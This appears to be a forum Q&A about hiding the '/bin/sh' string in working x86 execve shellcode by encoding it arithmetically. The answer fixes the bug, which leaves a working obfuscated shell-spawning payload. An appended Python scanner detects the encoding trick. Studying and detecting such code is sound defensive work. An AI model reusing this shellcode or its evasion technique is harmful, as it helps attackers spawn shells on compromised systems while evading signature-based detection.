I have this working shellcode that spawns a shell. I have to modify it such that I hide "/bin/sh" or "sh" from appearing anywhere in the binary after compiling. I have hence thought of taking the hex value of /bin/sh (2f 62 69 6e 2f 73 68), adding some random value to it, say 0x11111, moving that value to a register, subtracting 0x11111 at runtime and then pushing that runtime-generated value (which becomes /bin/sh) onto the stack and doing an execv. But I get a segmentation fault on the 1st step itself, and I am unable to figure out why.
The code below works fine.
section .data
section .text
global _start
_start:
xor eax,eax
cdq
push eax
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80
But this change causes a segmentation fault:
section .data
section .text
global _start
_start:
xor eax,eax
cdq
push eax
mov ecx,0x11111
mov ebx,0x68744040
sub ebx,ecx
push long eax
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80
Please help me with this. Will be grateful. Thanks.
The code is different, isn't it? Look here:
sub ebx,ecx
push long eax
You compute ebx-ecx, but push eax. And eax is zero.
It should be:
sub ebx,ecx
push long ebx
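A defender-side check for the technique discussed in this thread, added here as an example that is not part of the question or the answer: a small Python scanner that pulls 32-bit immediates out of x86 `mov r32, imm32` and `push imm32` instructions and reports any that spell a piece of "/bin/sh" either directly or after subtracting or adding another immediate, which is how the arithmetically encoded variant above shows up even though the plain string is absent. The sample bytes are the hand-assembled `mov`/`sub`/`push` sequence from the corrected snippet (constructed for this example); the function names are my own.

```python
import struct
from itertools import combinations, permutations

# Every 4-byte window of the strings the thread is trying to hide
# (execve path with and without the doubled slash).
TARGETS = [b"/bin/sh\x00", b"/bin//sh\x00"]
FRAGMENTS = {t[i:i + 4] for t in TARGETS for i in range(len(t) - 3)}
MASK = 0xFFFFFFFF

# Constructed sample: hand-assembled `mov ecx,0x11111; mov ebx,0x68744040;
# sub ebx,ecx; push ebx; push 0x6e69622f` (the corrected snippet from the answer).
SAMPLE = bytes.fromhex("b911110100" "bb40407468" "29cb" "53" "682f62696e")


def extract_immediates(blob):
    """Return every imm32 found after a `mov r32, imm32` (B8+r) or `push imm32`
    (68) opcode. The scan is overlapping (every byte offset is tried), so it is
    a heuristic that tolerates misalignment at the cost of some junk values."""
    imms = []
    for i in range(len(blob) - 4):
        op = blob[i]
        if 0xB8 <= op <= 0xBF or op == 0x68:
            imms.append(struct.unpack_from("<I", blob, i + 1)[0])
    return imms


def find_path_fragments(imms):
    """Report fragments of the target string that are present as a plain
    immediate, or that fall out of subtracting or adding two immediates
    (the runtime-decoding trick from the question)."""
    hits = []
    for v in imms:
        frag = struct.pack("<I", v)
        if frag in FRAGMENTS:
            hits.append(("plain", (v,), frag))
    for a, b in permutations(imms, 2):
        frag = struct.pack("<I", (a - b) & MASK)
        if frag in FRAGMENTS:
            hits.append(("sub", (a, b), frag))
    for a, b in combinations(imms, 2):
        frag = struct.pack("<I", (a + b) & MASK)
        if frag in FRAGMENTS:
            hits.append(("add", (a, b), frag))
    return hits


def scan(blob):
    """Combine the naive string search with the arithmetic check."""
    return {
        "plaintext": any(t.rstrip(b"\x00") in blob for t in TARGETS),
        "hits": find_path_fragments(extract_immediates(blob)),
    }


if __name__ == "__main__":
    for kind, ops, frag in scan(SAMPLE)["hits"]:
        print(kind, [hex(o) for o in ops], frag)
```

On the sample the plain string search finds nothing, while the arithmetic check reports `0x6e69622f` as "/bin" directly and `0x68744040 - 0x11111` as "//sh".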